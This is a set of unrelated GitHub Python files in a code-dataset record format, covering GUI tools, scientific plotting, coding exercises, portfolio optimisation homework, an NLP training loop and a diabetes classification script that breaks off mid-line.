cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n right_area, left_area, iou_score, img_both_eye, img_corrected = detect_frame(image)\n\n iou_score = \"{:.4f}\".format(iou_score)\n self.ui.TEXT_2.setText(iou_score)\n\n # get image infos\n height, width, channel = img_corrected.shape\n step = channel * width\n # create QImage from image\n qImg = QImage(img_corrected.data, width, height, step, QImage.Format_RGB888)\n # show image in img_label\n self.ui.imgLabel_1.setPixmap(QPixmap.fromImage(qImg))\n\n\n \n \n # get image blurred\n blurred = img_both_eye\n hsv = img_corrected \n\n height_2, width_2, channel_2 = blurred.shape\n step_2 = channel_2 * width_2\n qImg_2 = QImage(blurred.data, width_2, height_2, step_2, QImage.Format_RGB888)\n self.ui.imgLabel_2.setPixmap(QPixmap.fromImage(qImg_2))\n \n # get image hsv\n height_3, width_3, channel_3 = image.shape\n step_3 = channel_3 * width_3\n qImg_3 = QImage(image.data, width_3, height_3, step_3, QImage.Format_RGB888)\n self.ui.imgLabel_3.setPixmap(QPixmap.fromImage(qImg_3))\n \n # # get image mask\n # height_4, width_4= mask.shape\n # step_4 = 3 * width_4 # dont need step -> int bytesPerLine\n # qImg_4 = QImage(mask.data, width_4, height_4, QImage.Format_Grayscale8) # link ref https://qt.developpez.com/doc/4.7/qimage/ ; https://doc.qt.io/qt-5/qimage.html\n # self.ui.imgLabel_4.setPixmap(QPixmap.fromImage(qImg_4))\n \n if(self.logic==2): \n self.value = self.value + 1\n self.ui.TEXT_3.setText(\"Capture\")\n image = cv2.cvtColor(img_corrected, cv2.COLOR_BGR2RGB)\n cv2.imwrite('myout.png',img_corrected)\n self.logic=1 \n \n def controlTimer(self):\n # if timer is stopped\n if not self.timer.isActive():\n # create video capture\n self.cap = cv2.VideoCapture(0)\n # start timer\n self.timer.start(20)\n # update control_bt text\n self.ui.TEXT_6.setText(\"Running\")\n # if timer is started\n else:\n # stop timer\n self.timer.stop()\n # release video capture\n self.cap.release()\n # update control_bt text\n self.ui.TEXT_6.setText(\"Stop\")\n \nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n\n # create and show mainWindow\n mainWindow = MainWindow()\n mainWindow.show()\n\n sys.exit(app.exec_())\n \n\n\n# In[ ]:\n\n\n\n\n","repo_name":"upneet-bit/Eyebrow-Accuracy-Detector","sub_path":"process1/PFLD-pytorch/PyQt5_v10.py","file_name":"PyQt5_v10.py","file_ext":"py","file_size_in_byte":8865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13920549416","text":"'''\nProduce composite difference versus height plots comparing AERIoe retrievals\nDates analyzed: 20170516 -- 20170612\n\nAuthor: Brian Greene\nUniversity of Oklahoma\nLast update: April 2020\n'''\n# Python Packages\nimport os\nfrom datetime import datetime, timedelta\nimport warnings\nimport pickle\nimport gzip\n\n# Installed packages\nimport netCDF4\nimport numpy as np\nimport cmocean\n\nfrom glob import glob\nfrom datetime import datetime\nfrom scipy.interpolate import interp1d\nfrom matplotlib import rc\nfrom matplotlib import dates as mpdates\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\n AutoMinorLocator)\n\n# ---------------- #\n# Data directories #\n# ---------------- #\n# home directory\nhome = os.path.expanduser(\"~\")\n# main data directory\nBUL = os.path.join(home, \"Documents\", \"Data\", \"BUL\")\n# piclke file data (same directory as this file)\npkl = os.path.join(os.getcwd(), \"pkl\")\n# figure save directory\nfigpath = os.path.join(BUL, \"Figures\", \"composite\")\nif not os.path.exists(figpath):\n os.mkdir(figpath)\n# close all figures\nplt.close(\"all\")\n\n# -------------------------------------------------------------- #\n# Load 3 pickle files as dictionaries sorted by date of the data #\n# -------------------------------------------------------------- #\n# define reading function\ndef read_pickle_gz(filepath):\n print(f\"Reading file: {filepath.split(os.sep)[-1]}\")\n with gzip.open(filepath, \"rb\") as f:\n data = pickle.load(f)\n return data\n\ndef read_pickle(filepath):\n print(f\"Reading file: {filepath.split(os.sep)[-1]}\")\n with open(filepath, \"rb\") as f:\n data = pickle.load(f)\n return data\n\n# load data\nf_AERI = os.path.join(pkl, \"aeri.pickle\")\ndata_a = read_pickle(f_AERI)\nf_AERIrLID = os.path.join(pkl, \"aeri_rlid.pickle\")\ndata_ar = read_pickle(f_AERIrLID)\nf_AERIvDIAL = os.path.join(pkl, \"aeri_vdial.pickle\")\ndata_av = read_pickle(f_AERIvDIAL)\n\n# -------------------- #\n# Calculate statistics #\n# -------------------- #\n# temperature\n# raman\nT_diff_ar = data_a[\"temperature\"] - data_ar[\"temperature\"]\nT_med_ar = np.nanmedian(T_diff_ar, axis=0)\nT_q1_ar = np.nanpercentile(T_diff_ar, 25., axis=0)\nT_q3_ar = np.nanpercentile(T_diff_ar, 75., axis=0)\n# wv dial\nT_diff_av = data_a[\"temperature\"] - data_av[\"temperature\"]\nT_med_av = np.nanmedian(T_diff_av, axis=0)\nT_q1_av = np.nanpercentile(T_diff_av, 25., axis=0)\nT_q3_av = np.nanpercentile(T_diff_av, 75., axis=0)\n\n# wvmr\n# raman\nw_diff_ar = data_a[\"wvmr\"] - data_ar[\"wvmr\"]\nw_med_ar = np.nanmedian(w_diff_ar, axis=0)\nw_q1_ar = np.nanpercentile(w_diff_ar, 25., axis=0)\nw_q3_ar = np.nanpercentile(w_diff_ar, 75., axis=0)\n# wv dial\nw_diff_av = data_a[\"wvmr\"] - data_av[\"wvmr\"]\nw_med_av = np.nanmedian(w_diff_av, axis=0)\nw_q1_av = np.nanpercentile(w_diff_av, 25., axis=0)\nw_q3_av = np.nanpercentile(w_diff_av, 75., axis=0)\n\n# ---- #\n# Plot #\n# ---- #\nrc('font',weight='normal',size=20,family='serif',serif='Computer Modern Roman')\nrc('text',usetex='True')\nz = data_a[\"height\"]\n\nfig1, ax1 = plt.subplots(nrows=1, ncols=2, sharey=True, figsize=(12, 8))\n# temperature differences\n# raman\nax1[0].plot(T_med_ar, z, \"-b\", linewidth=3.)\nax1[0].fill_betweenx(z, T_q1_ar, T_q3_ar, alpha=0.3, color=\"b\")\n# wv dial\nax1[0].plot(T_med_av, z, \"-r\", linewidth=3.)\nax1[0].fill_betweenx(z, T_q1_av, T_q3_av, alpha=0.3, color=\"r\")\n# subplot setup\nax1[0].axvline(0., linewidth=2., color=\"k\", linestyle=\"--\")\nax1[0].grid()\nax1[0].set_xlabel(r\"$T_{AERI} - (T_{AERIrLID}, T_{AERIvDIAL})$ [$^\\circ$C]\", fontsize=20)\nax1[0].set_ylabel(\"Height [m AGL]\", fontsize=20)\nax1[0].set_xlim([-0.4, 0.6])\nax1[0].set_ylim([0., 3.7])\n\n# wvmr differences\nax1[1].plot(w_med_ar, z, \"-b\", linewidth=3)\nax1[1].fill_betweenx(z, w_q1_ar, w_q3_ar, alpha=0.3, color=\"b\")\n# wv dial\nax1[1].plot(w_med_av, z, \"-r\", linewidth=3)\nax1[1].fill_betweenx(z, w_q1_av, w_q3_av, alpha=0.3, color=\"r\")\n# subplot setup\nax1[1].axvline(0., linewidth=2., color=\"k\", linestyle=\"--\")\nax1[1].grid()\nax1[1].set_xlabel(r\"$w_{AERI} - (w_{AERIrLID}, w_{AERIvDIAL})$ [g kg$^{-1}$]\", fontsize=20)\nax1[1].set_xlim([-1.5, 1.5])\n\n#\n# Plot all diffs as xs\n#\n# vdial\nfig2, ax2 = plt.subplots(nrows=1, ncols=2, sharey=True, figsize=(12, 8))\n# temperature differences\nfor i in range(len(z)):\n ax2[0].plot(T_diff_av[:, i], z[i]*np.ones(len(T_diff_av[:, i])), \"kx\", alpha=0.3)\nax2[0].plot(T_med_ar, z, \"ro\")\nax2[0].plot(np.nanmean(T_diff_av, axis=0), z, \"bx\")\nax2[0].grid()\nax2[0].set_ylim([0., 1.])\nax2[0].set_xlim([-6., 6.])\nax2[0].set_ylabel(\"Height [km AGL]\")\nax2[0].set_xlabel(\"AERIonly T - AERIvDIAL T [$^\\circ$C]\")\n\n# wvmr diff\nfor i in range(len(z)):\n ax2[1].plot(w_diff_av[:, i], z[i]*np.ones(len(w_diff_av[:, i])), \"kx\", alpha=0.3)\nax2[1].plot(w_med_ar, z, \"ro\")\nax2[1].plot(np.nanmean(w_diff_av, axis=0), z, \"bx\")\nax2[1].grid()\nax2[1].set_xlim([-6., 6.])\nax2[1].set_xlabel(\"AERIonly w - AERIvDIAL w [g kg$^{-1}]\")\n\nplt.show()","repo_name":"bgreene777/BUL","sub_path":"plot_diff.py","file_name":"plot_diff.py","file_ext":"py","file_size_in_byte":4914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73908838547","text":"import matplotlib.pyplot as plt\r\nimport random\r\nfrom tkinter import * \r\nfrom tkinter import Entry\r\nfrom tkinter import messagebox\r\n\r\nclass GUI():\r\n def partition(self, arr, low, high): \r\n i = (low-1) # index of smaller element \r\n pivot = arr[high] # pivot \r\n \r\n for j in range(low , high): \r\n \r\n # If current element is smaller than the pivot \r\n if arr[j] < pivot: \r\n \r\n # increment index of smaller element \r\n i = i+1 \r\n arr[i],arr[j] = arr[j],arr[i] \r\n \r\n arr[i+1],arr[high] = arr[high],arr[i+1] \r\n\r\n return (i+1)\r\n\r\n def quickSort(self, arr,low,high): \r\n if low < high: \r\n \r\n # pi is partitioning index, arr[p] is now \r\n # at right place \r\n pi = self.partition(arr,low,high) \r\n \r\n # Separately sort elements before \r\n # partition and after partition \r\n self.quickSort(arr, low, pi-1) \r\n self.quickSort(arr, pi+1, high) \r\n \r\n # Driver code to test above\r\n def listToString(self, s):\r\n str1 = ''\r\n for ele in s:\r\n str1 += ele\r\n\r\n return str1\r\n\r\n def go(self):\r\n self.r = int(self.ran.get())\r\n self.q1 = int(self.q.get())\r\n\r\n for _ in range(self.q1):\r\n self.value = random.randint(0, self.r)\r\n self.L.append(self.value)\r\n self.generated = self.listToString(str(self.L))\r\n \r\n self.info = messagebox.showinfo('Generated numbers', self.generated)\r\n plt.plot(self.L, 'r--d')\r\n self.n = len(self.L)\r\n self.quickSort(self.L,0,self.n-1)\r\n\r\n for i in self.L:\r\n self.val_bin = format(i, 'b')\r\n self.L1.append(self.val_bin)\r\n self.generated1 = self.listToString(str(self.L1))\r\n\r\n self.info1 = messagebox.showinfo('Sorted generated numbers', self.listToString(str(self.L)))\r\n self.info2 = messagebox.showinfo('Sorted generated numbers in binary format', self.generated1)\r\n plt.plot(self.L, 'b--o')\r\n plt.show()\r\n\r\n def __init__(self):\r\n self.root = Tk()\r\n self.root.title('Data Sort')\r\n self.root.iconbitmap('pythonIcon.ico')\r\n self.frame = Frame()\r\n self.frame.pack()\r\n self.frame.config(bd=20)\r\n self.random = random.seed(0)\r\n self.lblRange = Label(self.frame, text = 'Please, insert the limit range of random numbers!')\r\n self.lblRange.grid(row=0, column=0, sticky='N')\r\n self.ran = Entry(self.frame)\r\n self.ran.grid(row=1, column=0, sticky='N')\r\n self.lblQuantity = Label(self.frame, text = 'Please, insert how many random numbers you want!')\r\n self.lblQuantity.grid(row=2, column=0, sticky='N')\r\n self.q = Entry(self.frame)\r\n self.q.grid(row=3, column=0, sticky='N')\r\n self.L = []\r\n self.L1 = []\r\n self.b1 = Button(self.frame, text = 'Go!', command = lambda: self.go())\r\n self.b1.grid(row=4, column=0, pady=5)\r\n self.b2 = Button(self.frame, text = 'Exit', command = self.root.destroy)\r\n self.b2.grid(row=5, column=0, pady=5)\r\n self.root.mainloop()\r\n\r\ngui = GUI()\r\n","repo_name":"EduardoCastro15/Algoritmos-Geneticos","sub_path":"Practicas/Pracs/GENETIC_ALGORITHMS/SimpleAG/GA_Practice00.py","file_name":"GA_Practice00.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11656715434","text":"\"\"\"\nproblem statement: \n\"\"\"\n\nimport unittest\n\n\ndef find_triplet(arr):\n arr = sorted(arr) # nlogn step\n l = 0\n r = len(arr) - 1\n\n\nclass TestCase(unittest.TestCase):\n def test_triplet_sum(self):\n dataT = [([0, -1, 2, -3, 1], (-1, 0, 1))]\n for test in dataT:\n result = find_triplet(test[0])\n assert result == test[1]\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"amitkmr/coding-questions","sub_path":"Arrays/find_triplet_with_zero_sum.py","file_name":"find_triplet_with_zero_sum.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"21118300704","text":"import numpy as np\n\nclass NearPoints:\n\tMILES_PER_LAT_DEGREE = 68.6863716\n\tMILES_PER_LONG_DEGREE_AT_EQUATOR = 69.1710411\n\n\tdef __init__(self, lat, lon):\n\t\t\"\"\"Helper class to find nearby points.\n\n\t\tThe MVP will blindly find points in a circle. Subsequent\n\t\teditions should be more intelligent, finding key landmarks,\n\t\tonly walking through safe spaces, etc.\n\n\t\tKnown limitations: We do not expect this to work at the poles\n\t\tor near the international date line.\n\n\t\tThe sunflower algorithm is inspired by \n\t\thttp://stackoverflow.com/questions/28567166/uniformly-distribute-x-points-inside-a-circle\n\n\t\tArgs:\n\t\t\tlat: latittude of the epicenter.\n\t\t\tlon: longitude of the epicenter.\n\t\t\"\"\"\n\t\tself.lat = lat\n\t\tself.lon = lon\n\n\tdef _radius(self, k, num_points, b):\n\t\t\"\"\"\n\t\tArgs:\n\t\tk: current point being written.\n\t\tnum_points: total number of points.\n\t\tb: number of non perimiter points.\n\t\t\"\"\"\n\t\tif k > (num_points - b):\n\t\t\treturn 1\n\t\telse:\n\t\t return np.sqrt(k-1/2) / np.sqrt(num_points-(b+1)/2)\n\n\tdef get_nearby_points(self, num_points, max_radius, alpha=1):\n\t\t\"\"\"Finds specified number of nearby points within radius.\n\n\t\tThe returned points are currently spread out uniformly within\n\t\tthe constrains of the radius.\n\n\t\tArgs:\n\t\tnum_points: number of points to be returned.\n\t\tmax_radius: max distance a point can lie from epicenter.\n\t\talpha: uniformity of the points.\n\n\t\tReturns:\n\t\titerable of n (lat,long) points.\n\t\t\"\"\"\n\t\tnearby_points = []\n\n\t\tb = int(max_radius * np.sqrt(num_points))\n\t\tphi = (np.sqrt(5)+1)/2\n\t\tfor k in range(1, num_points+1):\n\t\t\tr = self._radius(k,num_points,b)\n\t\t\ttheta = 2*np.pi*k/phi**2\n\t\t\tnearby_points.append((r*np.cos(theta), r*np.sin(theta)))\n\n\t\t# Convert distance in miles to degrees difference (this conversion\n\t\t# is different for latitude and longitude)\n\t\treturn [(self.lat + self._convert_vertical_dist_to_lat(dist_y * \\\n\t\t\t max_radius), self.lon + \\\n\t\t\t\t self._convert_horizontal_dist_to_longitude(self.lat, dist_x * max_radius)) \\\n\t\t\t\t for dist_y,dist_x in nearby_points]\n\n\tdef _convert_vertical_dist_to_lat(self, vertical_dist_miles):\n\t\t'''Converts a given distance (in miles) to its equivalent value\n\t\tin latidude degrees.\n\n\t\tSee https://stackoverflow.com/questions/1253499/simple-calculations-for-working-with-lat-lon-km-distance/1253545#1253545\n\n\t\tArgs:\n\t\tvertical_dist_miles: distance in miles going north/south\n\t\t'''\n\t\treturn vertical_dist_miles / self.MILES_PER_LAT_DEGREE\n\n\tdef _convert_horizontal_dist_to_longitude(self, current_latitude, \n\t\t\t\t\t\t\t\t\t\t\t horizontal_dist_miles):\n\t\t'''Converts a given distance (in miles) to its equivalent value\n\t\tin longitude degrees.\n\n\t\tSee https://stackoverflow.com/questions/1253499/simple-calculations-for-working-with-lat-lon-km-distance/1253545#1253545\n\n\t\tArgs:\n\t\tcurrent_latitude: current latitude degrees\n\t\thorizontal_dist_miles: distance in miles going east/west\n\t\t'''\n\t\treturn horizontal_dist_miles / self.MILES_PER_LONG_DEGREE_AT_EQUATOR \\\n\t\t\t* np.cos(current_latitude)\n\n\n","repo_name":"arthurbrant21/transportation","sub_path":"NearPoints.py","file_name":"NearPoints.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8570268613","text":"def main():\n x1, v1, x2, v2 = map(int, input().strip().split())\n\n result = kangaroo(x1, v1, x2, v2)\n \n print(result)\n\n# To be written in hackerRank\ndef kangaroo(x1, v1, x2, v2):\n # Write your code here\n while True:\n if v2 > v1 or v2 == v1:\n return \"NO\"\n \n else:\n x1 += v1 \n x2 += v2\n if x1 == x2:\n return \"YES\"\n elif x1 > x2:\n return \"NO\"\n else:\n continue\n\nif __name__ == \"__main__\":\n main()","repo_name":"mustafaAtefmustafa/IEEE-ZSB-Technical-Rookies-22","sub_path":"Task3/problem4_Kangaroo.py","file_name":"problem4_Kangaroo.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43510274972","text":"\"\"\"\nAuthor: Thomas Balzer\n(c) 2023\nMaterial for MMF Stochastic Analysis - Fall 2023\n\"\"\"\n\nimport plot_utilities as pu\nimport core_math_utilities as dist\nimport mmf_2023_1_portfolio_optimisation as p_opt\nimport numpy as np\n\n\"\"\"\nPortfolio Optimisation Examples - Homework #2\n\"\"\"\n\n\ndef marginal_utility_dpi(x, pi, risky_return, r):\n\n return (risky_return - r) / p_opt.portfolio_value(x, pi, risky_return, r)\n\n\ndef exp_marginal_utility(x, pi, u, d, p, r):\n\n return p * marginal_utility_dpi(x, pi, u, r) + (1-p) * marginal_utility_dpi(x, pi, d, r)\n\n\ndef portfolio_log_utility(x, pi, risky_return, r):\n\n return np.log(p_opt.portfolio_value(x, pi, risky_return, r))\n\n\ndef exp_utility(x, pi, u, d, p, r):\n\n return p * portfolio_log_utility(x, pi, u, r) + (1-p) * portfolio_log_utility(x, pi, d, r)\n\n\nif __name__ == '__main__':\n\n # basic parameters applicable to all questions\n _r = 0.05\n _x = 1.\n _u = 0.15\n _d = -0.05\n\n # determine minimum and maximum portfolio proportion to ensure V > 0\n min_portfolio = - (1. + _r) / (_u - _r)\n max_portfolio = - (1. + _r) / (_d - _r)\n print('Minimum Portfolio - ' + str(min_portfolio))\n print('Maximum Portfolio - ' + str(max_portfolio))\n\n step = 0.1\n n_steps = int((max_portfolio - min_portfolio)/step)\n # pis = [min_portfolio + (k+1) * step for k in range(n_steps-1)]\n pis = [-2. + k * step for k in range(100)]\n\n _p = 0.6\n\n print('Utility of Risk-Free Portfolio ' + str(exp_utility(_x, 0., _u, _d, _p, _r)))\n\n \"\"\"\n Plotting the expected utility and its derivative as a function of $\\pi$\n \"\"\"\n exp_util = [exp_utility(_x, pi, _u, _d, _p, _r) for pi in pis]\n exp_marg_util = [exp_marginal_utility(_x, pi, _u, _d, _p, _r) for pi in pis]\n colors = ['red', 'blue']\n mp = pu.PlotUtilities('Expected Utility and Derivative as Function of $\\pi$', '$\\pi$', 'None')\n mp.sub_plots(pis, [exp_util, exp_marg_util], ['Utility', 'Derivative'], colors)\n\n # Solving numerically where the derivative is zero\n eps = 1e-08\n max_exp_utility_portfolio = pis[np.argmax(exp_util)]\n print ('Maximum Portfolio (Numerically) - ' + str(max_exp_utility_portfolio))\n\n pi_star = (1+_r)*(_p * (_u-_d) + (_d-_r)) / (_r-_d) / (_u-_r)\n print('Log-Optimal Portfolio: ' + str(pi_star))\n\n print('Optimal Expected Utility: ' + str(exp_utility(_x, pi_star, _u, _d, _p, _r)))\n\n print('Monte Carlo Approximation of Value Function...')\n\n sample_size = 10000\n uniform_sample = np.random.uniform(0., 1., sample_size)\n ev = 0\n for uni in uniform_sample:\n ev = ev + portfolio_log_utility(_x, pi_star, (_u if uni < _p else _d), _r)\n\n print('MC Expected Optimal Utility: ' + str(ev / sample_size))\n\n # plotting utility as a function of portfolio\n util_mc = []\n for pi in pis:\n ev = 0\n for uni in uniform_sample:\n ev = ev + portfolio_log_utility(_x, pi, (_u if uni < _p else _d), _r)\n util_mc.append(ev / sample_size)\n\n mp = pu.PlotUtilities('Expected Utility Exact and MC', '$\\pi$', 'None')\n mp.sub_plots(pis, [exp_util, util_mc, [eu - um for eu, um in zip(exp_util, util_mc)]],\n ['Exact', 'MC', 'Diff'], ['red', 'green', 'blue'])\n\n print('Moment Matching Approximation of Optimal Utility...')\n\n mean_p = p_opt.exp_portfolio_value(_x, pi_star, _u, _d, _p, _r)\n var_p = p_opt.variance_portfolio_value(_x, pi_star, _u, _d, _p)\n\n print('Portfolio Mean: ' + str(mean_p))\n print('Portfolio Variance: ' + str(var_p))\n\n b = np.sqrt(np.log(var_p/mean_p/mean_p + 1.))\n\n normal_sample = [dist.standard_normal_inverse_cdf(1. - uni) for uni in uniform_sample]\n\n values_app = [mean_p * np.exp(b * ns - 0.5 * b * b) for ns in normal_sample]\n utility_app = [np.log(v) for v in values_app]\n\n print('MM Utility: ' + str(np.average(utility_app)))\n\n print('Moment Matched Mean(MC): ' + str(np.average(values_app)))\n values_ex = [p_opt.portfolio_value(_x, pi_star, (_u if uni < _p else _d), _r) for uni in uniform_sample]\n print('Mean (MC): ' + str(np.average(values_ex)))\n\n # scatter plot of the simulated defaults\n colors_sc = ['blue']\n\n mp = pu.PlotUtilities('Portfolio Value and Approx', 'x', 'y')\n mp.scatter_plot(values_ex, [values_app], ['None'], colors_sc)\n\n nv = 0\n util_approx = []\n for pi in pis:\n mean_pf = p_opt.exp_portfolio_value(_x, pi, _u, _d, _p, _r)\n var_pf = p_opt.variance_portfolio_value(_x, pi, _u, _d, _p)\n b = np.sqrt(np.log(var_pf / mean_pf / mean_pf + 1.))\n nv = 0\n for ns in normal_sample:\n v = (mean_pf * np.exp(b * ns - 0.5 * b * b))\n nv = nv + np.log(v)\n util_approx.append(nv/sample_size)\n\n mp = pu.PlotUtilities('Expected Utility Exact vs Moment Matched', '$\\pi$', 'None')\n mp.sub_plots(pis, [exp_util, util_approx, [eu - um for eu, um in zip(exp_util, util_approx)]],\n ['Exact', 'MM', 'Diff'], ['red', 'green', 'blue'])\n","repo_name":"drthomasbalzer/mmf_2023","sub_path":"mmf_2023_2_portfolio_optimisation_homework.py","file_name":"mmf_2023_2_portfolio_optimisation_homework.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"24461553902","text":"#! /usr/bin\n# -*- coding: UTF-8 -*-\n\nfrom __future__ import print_function\n\ndef main():\n\n # Read the input\n with open('input', 'rb') as in_file:\n file_contents = in_file.readlines()\n\n input = str(file_contents[0].rstrip())\n\n elf_1_index = 0\n elf_2_index = 1\n\n # The starting recipes\n recipe_list = [3, 7]\n\n tail = []\n while not input in ''.join(map(str, tail)):\n tail = recipe_list[-1 * (2 + len(input)):]\n recipe_list += generate_new_recipes(elf_1_index, elf_2_index, recipe_list)\n elf_1_index = get_next_recipe_index(elf_1_index, recipe_list)\n elf_2_index = get_next_recipe_index(elf_2_index, recipe_list)\n\n print('{input} first appears after {start} recipes.'.format(\n input=input,\n start=''.join(map(str, recipe_list)).index(input)\n ))\n\n\ndef print_recipe_list(i1, i2, recipe_list):\n for i in range(0, len(recipe_list)):\n if i == i1:\n print('({val})'.format(val=recipe_list[i]), end='')\n elif i == i2:\n print('[{val}]'.format(val=recipe_list[i]), end='')\n else:\n print(' {val} '.format(val=recipe_list[i]), end='')\n print('')\n\ndef generate_new_recipes(index1, index2, recipe_list):\n r1 = recipe_list[index1]\n r2 = recipe_list[index2]\n new_recipe_scores = r1 + r2\n return map(int, list(str(new_recipe_scores)))\n\n\ndef get_next_recipe_index(starting_index, recipe_list):\n next_recipe_index = starting_index + 1 + recipe_list[starting_index]\n next_recipe_index = next_recipe_index % len(recipe_list)\n return next_recipe_index\n\nif __name__ == '__main__':\n main()\n","repo_name":"mbamber/AdventOfCode2018","sub_path":"day14/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71517770387","text":"import torch \nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom sklearn import metrics\nimport numpy as np\nimport time\nfrom utils import get_time_diff\n\nclass Executor:\n def __init__(self, config):\n super().__init__()\n self.config = config\n\n def train_model(self, data_loader, model):\n # 训练模型\n start_time = time.time() #获取起始位置\n optimizer = optim.Adam(model.parameters(), lr=self.config.learn_rate, betas=(0.9, 0.999))\n model.train()\n criterion = nn.CrossEntropyLoss()\n total_batch = 0\n for data_batch in data_loader:\n total_batch += 1\n sentences1 = data_batch[0]\n sentences2 = data_batch[1]\n labels = data_batch[2]\n if torch.cuda.is_available(): # 判断设备信息\n sentences1 = data_batch[0].to(self.config.device)\n sentences2 = data_batch[1].to(self.config.device)\n labels = data_batch[2].to(self.config.device)\n optimizer.zero_grad()\n outputs = model(sentences1, sentences2)\n #计算 loss\n loss = criterion(outputs, labels) \n loss.backward()\n optimizer.step()\n\n if total_batch % 100 == 0:\n true_label = labels.data.cpu().numpy()\n predict = torch.max(outputs, dim=1)[1].cpu().numpy() #获取预测结果\n train_acc = metrics.accuracy_score(true_label, predict)\n time_diff = get_time_diff(start_time)\n msg = 'Iter:{0:>6} Train loss: {1:>5.3} Train acc:{2:>6.2%} Time:{3}'\n print(msg.format(total_batch, loss.item(), train_acc, time_diff))\n\n\n def evaluate_model(self, data_loader, model):\n start_time = time.time()\n model.eval()\n total_loss = 0\n predicts_all = np.array([], dtype=int)\n labels_all = np.array([], dtype=int)\n criterion = nn.CrossEntropyLoss()\n with torch.no_grad():\n for data_batch in data_loader:\n sentences1 = data_batch[0]\n sentences2 = data_batch[1]\n labels = data_batch[2]\n if torch.cuda.is_available():\n sentences1 = data_batch[0].to(self.config.device)\n sentences2 = data_batch[1].to(self.config.device)\n labels = data_batch[2].to(self.config.device)\n outputs = model(sentences1, sentences2)\n loss = criterion(outputs, labels)\n total_loss += loss.item()\n # 将预测结果写入记录\n predict = torch.max(outputs, dim=1)[1].cpu().numpy()\n labels = labels.data.cpu().numpy()\n labels_all = np.append(labels_all, labels)\n predicts_all = np.append(predicts_all, predict)\n #生成评估结果\n acc = metrics.accuracy_score(labels_all, predicts_all)\n report = metrics.classification_report(labels_all, predicts_all, digits=4)\n confusion = metrics.confusion_matrix(labels_all, predicts_all) # 混淆矩阵\n f1_score = metrics.f1_score(labels_all, predicts_all, average='macro')\n return acc, total_loss / len(data_loader), report, confusion, f1_score\n\n def inference(self, data_loader, model):\n # 预测输出\n predicts_all = np.array([], dtype=int)\n model.eval()\n with torch.no_grad():\n for batch in data_loader:\n sentences1 = batch[0]\n sentences2 = batch[1]\n if torch.cuda.is_available():\n sentences1 = batch[0].to(self.config.device)\n sentences2 = batch[1].to(self.config.device)\n outputs = model(sentences1, sentences2)\n predict = torch.max(outputs, dim=1)[1].cpu().numpy()\n predicts_all = np.append(predicts_all, predict)\n\n return predicts_all\n\n\n","repo_name":"LeslieOverfitting/nlp_AFQMC","sub_path":"executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41472624247","text":"import pygame as pg\n\nfrom .. import tools, prepare\nfrom ..components import transport_sleigh\n\nclass IntroSplash(tools._State):\n def __init__(self):\n super(IntroSplash, self).__init__()\n self.next = \"MANAGING\"\n self.player = prepare.PLAYER\n self.image = prepare.GFX[\"title\"]\n center_point = pg.display.get_surface().get_rect().center\n self.image_rect = self.image.get_rect(center=center_point)\n self.cursor = prepare.GFX[\"canecursor\"]\n screen = pg.display.get_surface().get_rect()\n self.sleigh = transport_sleigh.TransportSleigh((screen.right + 10, 200), None)\n self.persist[\"player\"] = self.player\n self.persist[\"helping\"] = False\n pg.mouse.set_visible(False)\n \n def get_event(self, event):\n if event.type == pg.MOUSEBUTTONDOWN:\n self.done = True\n \n def update(self, surface, keys, dt):\n surface.blit(self.image, self.image_rect)\n self.sleigh.rect.move_ip(-1, 0)\n self.sleigh.draw(surface)\n surface.blit(self.cursor, pg.mouse.get_pos()) \n\n","repo_name":"iminurnamez/NorthPole","sub_path":"data/states/introsplash.py","file_name":"introsplash.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"23971158750","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom pandas.plotting import scatter_matrix\nfrom sklearn.model_selection import train_test_split, GridSearchCV, RandomizedSearchCV\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport pickle\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.compose import ColumnTransformer\nfrom lazypredict.Supervised import LazyClassifier\n\ndf = pd.read_csv('diabetes.csv')\n\n\n# data processing\n#print(df.head())\nprint(df.info()) # check null value\n\n# check number of classes of target\nnumber_class = df['Outcome']\nprint(number_class.value_counts())\n\n\n# check dtype of data\n#print(df.dtypes)\n\n# summary data\n#print(df.describe())\n\n\n# data visualization\n\n# histogram for all data\n#df.hist() \n\n# Density plot for all data\n\n#df.plot(kind = 'density', subplots = True, layout =(3,3), sharex = False)\n\n\n# box plot for all data\n#df.plot(kind = 'box', subplots = True, layout =(3,3), sharex = False)\n\n\n# correlation matrix\n\n#sns.heatmap(data=df.corr(), annot= True)\n\n\n# scatter matrix plot\n#scatter_matrix(df)\n#plt.show()\n\n\n# Data split\n\ntarget = 'Outcome'\ny = df[target]\nx = df.drop(target, axis= 1)\n\nx_train, x_test, y_train, y_test = train_test_split(x,y, 